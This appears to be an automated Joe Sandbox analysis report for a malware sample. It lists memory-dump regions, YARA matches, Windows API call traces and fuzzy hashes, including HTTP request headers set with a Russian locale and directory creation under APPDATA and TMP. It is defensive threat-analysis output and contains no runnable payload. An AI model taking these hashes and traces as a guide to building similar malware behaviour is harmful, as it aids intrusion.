                                                              • Instruction Fuzzy Hash: 5111087774118243D681C56DC4F86ABA3DEFBC52A0729436AF0D28FA58D2F2DAC5A600
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953574713.00000000007AA000.00000040.00000020.00020000.00000000.sdmp, Offset: 007AA000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7aa000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                              • Instruction ID: 1dba8607ed648125447f2d4f31f12ff64bc79c31ae6477ff173cf81eb95c623d
                                                              • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                              • Instruction Fuzzy Hash: 95118E72340100AFDB44DF59DD81EA673EAEB8A320B298165ED09CB312D779EC42C760
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                              • Instruction ID: 5edd786cd43c79b7283201332adfa0d70d5c543a0a79b86af67657a73ec68d09
                                                              • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                              • Instruction Fuzzy Hash: C7012672A507008FDF21CF60C804BAA33F5FBCA206F1540B9D90AD7381E770A841CB80
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 49cb94a3bcbf570ab7a683de86508d9cb72f1b21a63cda5ac60ca76d38988586
                                                              • Instruction ID: fea5500236d8e45452d6d1c6df396d94c1602311ee763e81dc28c8ce33e409f2
                                                              • Opcode Fuzzy Hash: 49cb94a3bcbf570ab7a683de86508d9cb72f1b21a63cda5ac60ca76d38988586
                                                              • Instruction Fuzzy Hash: 5CE08C72A56228EFCB24EB98C98498AF3ECEB44B09B11049AB501D3200C371DF00CBD0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 49cb94a3bcbf570ab7a683de86508d9cb72f1b21a63cda5ac60ca76d38988586
                                                              • Instruction ID: 91f9cbf9c998b6b154933009beec7cf969d7c2669516eed5026d1d53449b0fde
                                                              • Opcode Fuzzy Hash: 49cb94a3bcbf570ab7a683de86508d9cb72f1b21a63cda5ac60ca76d38988586
                                                              • Instruction Fuzzy Hash: F9E08C72921268EBCB14DBC9CA0498AF3ECEB45B54B1504ABF601D3200C278DE41C7D4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2954294685.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000000.00000002.2954274750.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.2954315683.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.2954333339.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 225e9490ce15994035050fff8e8d94bbe50aeb352c3921d505d22bbc77bda227
                                                              • Instruction ID: 49573a245b17cd2143a7f0a663dc82b9d5ba07e6c12e429f55ccbb336c262c76
                                                              • Opcode Fuzzy Hash: 225e9490ce15994035050fff8e8d94bbe50aeb352c3921d505d22bbc77bda227
                                                              • Instruction Fuzzy Hash: CEE08C32E11228EBCB10CB88C940E8AB3ECFB86A80F114096B505E3101D274DF00C7C2
                                                              APIs
                                                              • ___free_lconv_mon.LIBCMT ref: 02190725
                                                                • Part of subcall function 0218F98D: _free.LIBCMT ref: 0218F9AA
                                                                • Part of subcall function 0218F98D: _free.LIBCMT ref: 0218F9BC
                                                                • Part of subcall function 0218F98D: _free.LIBCMT ref: 0218F9CE
                                                                • Part of subcall function 0218F98D: _free.LIBCMT ref: 0218F9E0
                                                                • Part of subcall function 0218F98D: _free.LIBCMT ref: 0218F9F2
                                                                • Part of subcall function 0218F98D: _free.LIBCMT ref: 0218FA04
                                                                • Part of subcall function 0218F98D: _free.LIBCMT ref: 0218FA16
                                                                • Part of subcall function 0218F98D: _free.LIBCMT ref: 0218FA28
                                                                • Part of subcall function 0218F98D: _free.LIBCMT ref: 0218FA3A
                                                                • Part of subcall function 0218F98D: _free.LIBCMT ref: 0218FA4C
                                                                • Part of subcall function 0218F98D: _free.LIBCMT ref: 0218FA5E
                                                                • Part of subcall function 0218F98D: _free.LIBCMT ref: 0218FA70
                                                                • Part of subcall function 0218F98D: _free.LIBCMT ref: 0218FA82
                                                              • _free.LIBCMT ref: 0219071A
                                                                • Part of subcall function 0218994F: HeapFree.KERNEL32(00000000,00000000,?,021900E2,?,00000000,?,?,?,02190385,?,00000007,?,?,02190878,?), ref: 02189965
                                                                • Part of subcall function 0218994F: GetLastError.KERNEL32(?,?,021900E2,?,00000000,?,?,?,02190385,?,00000007,?,?,02190878,?,?), ref: 02189977
                                                              • _free.LIBCMT ref: 0219073C
                                                              • _free.LIBCMT ref: 02190751
                                                              • _free.LIBCMT ref: 0219075C
                                                              • _free.LIBCMT ref: 0219077E
                                                              • _free.LIBCMT ref: 02190791
                                                              • _free.LIBCMT ref: 0219079F
                                                              • _free.LIBCMT ref: 021907AA
                                                              • _free.LIBCMT ref: 021907E2
                                                              • _free.LIBCMT ref: 021907E9
                                                              • _free.LIBCMT ref: 02190806
                                                              • _free.LIBCMT ref: 0219081E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                              • String ID: qC$PrC
                                                              • API String ID: 161543041-1020004248
                                                              APIs
                                                              • ___free_lconv_mon.LIBCMT ref: 004204BE
                                                                • Part of subcall function 0041F726: _free.LIBCMT ref: 0041F743
                                                                • Part of subcall function 0041F726: _free.LIBCMT ref: 0041F755
                                                                • Part of subcall function 0041F726: _free.LIBCMT ref: 0041F767
                                                                • Part of subcall function 0041F726: _free.LIBCMT ref: 0041F779
                                                                • Part of subcall function 0041F726: _free.LIBCMT ref: 0041F78B
                                                                • Part of subcall function 0041F726: _free.LIBCMT ref: 0041F79D
                                                                • Part of subcall function 0041F726: _free.LIBCMT ref: 0041F7AF
                                                                • Part of subcall function 0041F726: _free.LIBCMT ref: 0041F7C1
                                                                • Part of subcall function 0041F726: _free.LIBCMT ref: 0041F7D3
                                                                • Part of subcall function 0041F726: _free.LIBCMT ref: 0041F7E5
                                                                • Part of subcall function 0041F726: _free.LIBCMT ref: 0041F7F7
                                                                • Part of subcall function 0041F726: _free.LIBCMT ref: 0041F809
                                                                • Part of subcall function 0041F726: _free.LIBCMT ref: 0041F81B
                                                              • _free.LIBCMT ref: 004204B3
                                                                • Part of subcall function 004196E8: RtlFreeHeap.NTDLL(00000000,00000000,?,0041FE7B,?,00000000,?,?,?,0042011E,?,00000007,?,?,00420611,?), ref: 004196FE
                                                                • Part of subcall function 004196E8: GetLastError.KERNEL32(?,?,0041FE7B,?,00000000,?,?,?,0042011E,?,00000007,?,?,00420611,?,?), ref: 00419710
                                                              • _free.LIBCMT ref: 004204D5
                                                              • _free.LIBCMT ref: 004204EA
                                                              • _free.LIBCMT ref: 004204F5
                                                              • _free.LIBCMT ref: 00420517
                                                              • _free.LIBCMT ref: 0042052A
                                                              • _free.LIBCMT ref: 00420538
                                                              • _free.LIBCMT ref: 00420543
                                                              • _free.LIBCMT ref: 0042057B
                                                              • _free.LIBCMT ref: 00420582
                                                              • _free.LIBCMT ref: 0042059F
                                                              • _free.LIBCMT ref: 004205B7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                              • String ID: tqC
                                                              • API String ID: 161543041-1967669507
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: _free
                                                              • String ID: tqC
                                                              • API String ID: 269201875-1967669507
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free$Info
                                                              • String ID:
                                                              • API String ID: 2509303402-0
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: _free$Info
                                                              • String ID:
                                                              • API String ID: 2509303402-0
                                                              APIs
                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(004383D4,00000FA0,?,?,0040D002), ref: 0040D030
                                                              • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,0040D002), ref: 0040D03B
                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,0040D002), ref: 0040D04C
                                                              • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0040D05E
                                                              • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0040D06C
                                                              • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,0040D002), ref: 0040D08F
                                                              • DeleteCriticalSection.KERNEL32(004383D4,00000007,?,?,0040D002), ref: 0040D0AB
                                                              • CloseHandle.KERNEL32(00000000,?,?,0040D002), ref: 0040D0BB
                                                              Strings
                                                              • WakeAllConditionVariable, xrefs: 0040D064
                                                              • kernel32.dll, xrefs: 0040D047
                                                              • api-ms-win-core-synch-l1-2-0.dll, xrefs: 0040D036
                                                              • SleepConditionVariableCS, xrefs: 0040D058
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                              • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                              • API String ID: 2565136772-3242537097
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free
                                                              • String ID: tqC$xqC
                                                              • API String ID: 269201875-4129656487
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: _free
                                                              • String ID: tqC$xqC
                                                              • API String ID: 269201875-4129656487
                                                              APIs
                                                              • IsInExceptionSpec.LIBVCRUNTIME ref: 021803B6
                                                              • type_info::operator==.LIBVCRUNTIME ref: 021803D8
                                                              • ___TypeMatch.LIBVCRUNTIME ref: 021804E7
                                                              • IsInExceptionSpec.LIBVCRUNTIME ref: 021805B9
                                                              • _UnwindNestedFrames.LIBCMT ref: 0218063D
                                                              • CallUnexpected.LIBVCRUNTIME ref: 02180658
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                              • String ID: csm$csm$csm
                                                              • API String ID: 2123188842-393685449
                                                              APIs
                                                              • IsInExceptionSpec.LIBVCRUNTIME ref: 0041014F
                                                              • type_info::operator==.LIBVCRUNTIME ref: 00410171
                                                              • ___TypeMatch.LIBVCRUNTIME ref: 00410280
                                                              • IsInExceptionSpec.LIBVCRUNTIME ref: 00410352
                                                              • _UnwindNestedFrames.LIBCMT ref: 004103D6
                                                              • CallUnexpected.LIBVCRUNTIME ref: 004103F1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                              • String ID: csm$csm$csm
                                                              • API String ID: 2123188842-393685449
                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 10001CE7
                                                              • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,00000264,1000202E,?), ref: 10001D2D
                                                              • CreateDirectoryA.KERNEL32(?,00000000,?,?,00000000,?,?,00000001,00000000), ref: 10001DE9
                                                              • GetLastError.KERNEL32(?,?,00000001,00000000), ref: 10001DF9
                                                              • GetTempPathA.KERNEL32(00000104,?,?,?,00000001,00000000), ref: 10001E12
                                                              • CreateDirectoryA.KERNEL32(?,00000000,?,?,00000000,?,?,00000001,00000000,?,?,00000001,00000000), ref: 10001ECC
                                                              • GetLastError.KERNEL32(?,?,00000001,00000000,?,?,00000001,00000000), ref: 10001ED2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2954294685.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000000.00000002.2954274750.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.2954315683.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.2954333339.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: CreateDirectoryErrorLastPath$FolderH_prolog3_Temp
                                                              • String ID: APPDATA$TMPDIR
                                                              • API String ID: 1838500112-4048745339
                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 100010CE
                                                              • HttpAddRequestHeadersA.WININET(?,?,?,20000000), ref: 10001103
                                                              • HttpAddRequestHeadersA.WININET(?,?,?,20000000), ref: 10001123
                                                              • HttpAddRequestHeadersA.WININET(?,?,?,20000000), ref: 10001143
                                                              • HttpAddRequestHeadersA.WININET(?,?,?,20000000), ref: 10001163
                                                              Strings
                                                              • Accept-Language: ru-RU,ru;q=0.9,en;q=0.8, xrefs: 10001105
                                                              • Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0, xrefs: 10001145
                                                              • Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1, xrefs: 10001125
                                                              • Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1, xrefs: 100010D9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2954294685.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000000.00000002.2954274750.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.2954315683.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.2954333339.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: HeadersHttpRequest$H_prolog3_
                                                              • String ID: Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1$Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0$Accept-Language: ru-RU,ru;q=0.9,en;q=0.8$Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                              • API String ID: 1254599795-787135837
                                                              APIs
                                                              • _free.LIBCMT ref: 02188F88
                                                                • Part of subcall function 0218994F: HeapFree.KERNEL32(00000000,00000000,?,021900E2,?,00000000,?,?,?,02190385,?,00000007,?,?,02190878,?), ref: 02189965
                                                                • Part of subcall function 0218994F: GetLastError.KERNEL32(?,?,021900E2,?,00000000,?,?,?,02190385,?,00000007,?,?,02190878,?,?), ref: 02189977
                                                              • _free.LIBCMT ref: 02188F94
                                                              • _free.LIBCMT ref: 02188F9F
                                                              • _free.LIBCMT ref: 02188FAA
                                                              • _free.LIBCMT ref: 02188FB5
                                                              • _free.LIBCMT ref: 02188FC0
                                                              • _free.LIBCMT ref: 02188FCB
                                                              • _free.LIBCMT ref: 02188FD6
                                                              • _free.LIBCMT ref: 02188FE1
                                                              • _free.LIBCMT ref: 02188FEF
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              APIs
                                                              • _free.LIBCMT ref: 00418D21
                                                                • Part of subcall function 004196E8: RtlFreeHeap.NTDLL(00000000,00000000,?,0041FE7B,?,00000000,?,?,?,0042011E,?,00000007,?,?,00420611,?), ref: 004196FE
                                                                • Part of subcall function 004196E8: GetLastError.KERNEL32(?,?,0041FE7B,?,00000000,?,?,?,0042011E,?,00000007,?,?,00420611,?,?), ref: 00419710
                                                              • _free.LIBCMT ref: 00418D2D
                                                              • _free.LIBCMT ref: 00418D38
                                                              • _free.LIBCMT ref: 00418D43
                                                              • _free.LIBCMT ref: 00418D4E
                                                              • _free.LIBCMT ref: 00418D59
                                                              • _free.LIBCMT ref: 00418D64
                                                              • _free.LIBCMT ref: 00418D6F
                                                              • _free.LIBCMT ref: 00418D7A
                                                              • _free.LIBCMT ref: 00418D88
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              APIs
                                                              • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,004259BF), ref: 00424F0F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: DecodePointer
                                                              • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                              • API String ID: 3527080286-3064271455
                                                              APIs
                                                              • type_info::operator==.LIBVCRUNTIME ref: 10004250
                                                              • ___TypeMatch.LIBVCRUNTIME ref: 1000435E
                                                              • _UnwindNestedFrames.LIBCMT ref: 100044B0
                                                              • CallUnexpected.LIBVCRUNTIME ref: 100044CB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2954294685.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000000.00000002.2954274750.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.2954315683.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.2954333339.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                              • String ID: csm$csm$csm
                                                              • API String ID: 2751267872-393685449
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 0040CBE2
                                                              • __alloca_probe_16.LIBCMT ref: 0040CC0E
                                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 0040CC4D
                                                              • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040CC6A
                                                              • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0040CCA9
                                                              • __alloca_probe_16.LIBCMT ref: 0040CCC6
                                                              • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040CD08
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 0040CD2B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                              • String ID:
                                                              • API String ID: 2040435927-0
                                                              • Opcode ID: 4226c0a309d17539fe735c567b77fc588b25ab9f355964044341ac6f8b5074c7
                                                              • Instruction ID: 0eef22ec5c0ed95795941b36f16f6703666d7858d80347e3b12d355d98e8a1b2
                                                              • Opcode Fuzzy Hash: 4226c0a309d17539fe735c567b77fc588b25ab9f355964044341ac6f8b5074c7
                                                              • Instruction Fuzzy Hash: 7851B07260020AEBEB205F65CC85FAB3BB9EF44754F15463AF914B6290DB789C05CB98
                                                              APIs
                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(004383D4,00000FA0,?,?,0217D269), ref: 0217D297
                                                              • GetModuleHandleW.KERNEL32(00429060,?,?,0217D269), ref: 0217D2A2
                                                              • GetModuleHandleW.KERNEL32(004290A4,?,?,0217D269), ref: 0217D2B3
                                                              • GetProcAddress.KERNEL32(00000000,004290C0), ref: 0217D2C5
                                                              • GetProcAddress.KERNEL32(00000000,004290DC), ref: 0217D2D3
                                                              • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,0217D269), ref: 0217D2F6
                                                              • RtlDeleteCriticalSection.NTDLL(004383D4), ref: 0217D312
                                                              • CloseHandle.KERNEL32(004383D0,?,?,0217D269), ref: 0217D322
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                              • String ID:
                                                              • API String ID: 2565136772-0
                                                              • Opcode ID: b726dbf4f5b8d2158f5e32706ecf7d801b2e9ac09e7f6c89845f8a688fa70d75
                                                              • Instruction ID: 7dcf16f5c09856e9ec6145949905142dcd236a5571ca2d9c1a44016a124679ab
                                                              • Opcode Fuzzy Hash: b726dbf4f5b8d2158f5e32706ecf7d801b2e9ac09e7f6c89845f8a688fa70d75
                                                              • Instruction Fuzzy Hash: D40152717827259BDB311B74BC0DB6B76A89F88F41B55402ABD04E2290EFB5C8068A6C
                                                              APIs
                                                                • Part of subcall function 0218908A: GetLastError.KERNEL32(021720FF,?,02172103,021816D8,?,021720FF,004280A0,?,0218933A,00000000,004280A0,00000000,00000000,021720FF), ref: 0218908F
                                                                • Part of subcall function 0218908A: SetLastError.KERNEL32(00000000,00437188,000000FF,?,0218933A,00000000,004280A0,00000000,00000000,021720FF), ref: 0218912D
                                                              • _free.LIBCMT ref: 0218870E
                                                              • _free.LIBCMT ref: 02188727
                                                              • _free.LIBCMT ref: 02188765
                                                              • _free.LIBCMT ref: 0218876E
                                                              • _free.LIBCMT ref: 0218877A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free$ErrorLast
                                                              • String ID: PrC
                                                              • API String ID: 3291180501-1629617404
                                                              • Opcode ID: c79852c48309a195d8900170292c7256d956fbc528769400df0c6a89e8965495
                                                              • Instruction ID: 483dcd9d4128a1275580eaa6bab69ae5d4a4b3751640ca5d5d3dbe3f7f69216b
                                                              • Opcode Fuzzy Hash: c79852c48309a195d8900170292c7256d956fbc528769400df0c6a89e8965495
                                                              • Instruction Fuzzy Hash: C1B12B7594121ADFDB25EF18C8C4BA9B7B5FF48314F9145AAD849A7350D730AE90CF80
                                                              APIs
                                                              • __alloca_probe_16.LIBCMT ref: 0041B9CE
                                                              • __alloca_probe_16.LIBCMT ref: 0041BA94
                                                              • __freea.LIBCMT ref: 0041BB00
                                                                • Part of subcall function 0041A395: RtlAllocateHeap.NTDLL(00000000,?,?,?,0040E15B,?,?,?,004010DD,?,00403497,?,?,?), ref: 0041A3C7
                                                              • __freea.LIBCMT ref: 0041BB09
                                                              • __freea.LIBCMT ref: 0041BB2C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                              • String ID: uA
                                                              • API String ID: 1423051803-3888042258
                                                              • Opcode ID: 4828b68452414b976fce63ca4c703ddfeade55bfdfb8d09f6675fe12ed361c88
                                                              • Instruction ID: ced852eb499a8acaff1ad66fc4d965fe1516489bf7db7eeb17bdd08576ef726b
